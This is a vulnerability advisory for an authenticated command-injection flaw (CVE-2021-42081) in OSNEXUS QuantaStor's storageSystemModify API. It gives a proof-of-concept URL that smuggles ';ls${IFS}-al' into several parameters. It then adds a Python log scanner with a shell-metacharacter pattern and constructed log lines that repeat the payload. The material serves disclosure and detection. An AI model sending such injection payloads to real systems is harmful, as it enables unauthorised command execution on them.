
CVE-2021-42081

Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355

CVE: CVE-2021-42081
Title: Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Credits:
Affected products:
  Product | Affected | Unaffected | Unknown
  OSNEXUS QuantaStor | >= 0 to < 6.0.0.355 (semver)
  everything else
CVSS Base score: 9.1 (CRITICAL)
References:
Problem type(s): CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Date published:
Last modified: 11 Mar 2025 13:39 UTC

Description

An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.

POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
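The PoC above injects shell syntax (a `;` separator and the `${IFS}` whitespace substitute) into free-text and server-list parameters of the storageSystemModify API. The following detection script is an added example, not part of the advisory or of QuantaStor; it scans constructed combined-format access log lines for requests to /qstorapi/ whose watched parameters carry shell metacharacters, decoding percent-encoding first so `%3B` is treated the same as a literal `;`.

```python
"""Flag CVE-2021-42081-style command injection attempts against QuantaStor's
/qstorapi/storageSystemModify endpoint in web-server access logs.
Added detection example; the log lines below are constructed, not from the advisory."""
import re
from urllib.parse import urlsplit, unquote

# Parameters the advisory's PoC injects into; legitimate values are a name, a
# description, or a list of DNS/NTP server addresses, none of which need shell syntax.
WATCHED_PARAMS = {"newName", "newDescription", "newDnsServerList", "newNTPServerList"}
# Shell metacharacters plus the ${IFS} whitespace substitution seen in the PoC.
SHELL_META = re.compile(r"\$\{IFS\}|[;&|`$()<>\n]")
# Request target inside a combined-format (Apache/nginx) access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/')

def parse_query(query):
    """Split on '&' only and percent-decode, so a ';' in a value is never a separator."""
    params = {}
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        params.setdefault(unquote(name), []).append(unquote(value))
    return params

def suspicious_params(target):
    """Return {param: decoded value} for watched qstorapi parameters carrying shell syntax."""
    parts = urlsplit(target)
    if not parts.path.startswith("/qstorapi/"):
        return {}
    return {name: value
            for name, values in parse_query(parts.query).items() if name in WATCHED_PARAMS
            for value in values if SHELL_META.search(value)}

def scan_log(lines):
    """Return [(client_ip, {param: value})] for each line carrying an injection attempt."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        hits = suspicious_params(m.group(1)) if m else {}
        if hits:
            findings.append((line.split(" ", 1)[0], hits))
    return findings

SAMPLE_LOG = [  # constructed; the first line mirrors the shape of the advisory's PoC
    '10.0.0.5 - admin [11/Mar/2025:13:39:00 +0000] "GET /qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4 HTTP/1.1" 200 512',
    '10.0.0.5 - admin [11/Mar/2025:13:40:00 +0000] "GET /qstorapi/storageSystemModify?newDescription=main%20site&newDnsServerList=10.0.0.2,10.0.0.3 HTTP/1.1" 200 512',
    '10.0.0.7 - admin [11/Mar/2025:13:41:00 +0000] "GET /qstorapi/storageSystemModify?newNTPServerList=%3Bls HTTP/1.1" 200 100',
    '10.0.0.8 - admin [11/Mar/2025:13:42:00 +0000] "GET /manage/index.html?q=;ls HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, hits)
```

Because the flaw is only reachable by an authenticated administrator, a hit also identifies which admin account or session issued the request, which is worth correlating with the upgrade status of the appliance.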

Solution(s)

Upgrade to the latest version of OSNEXUS QuantaStor.

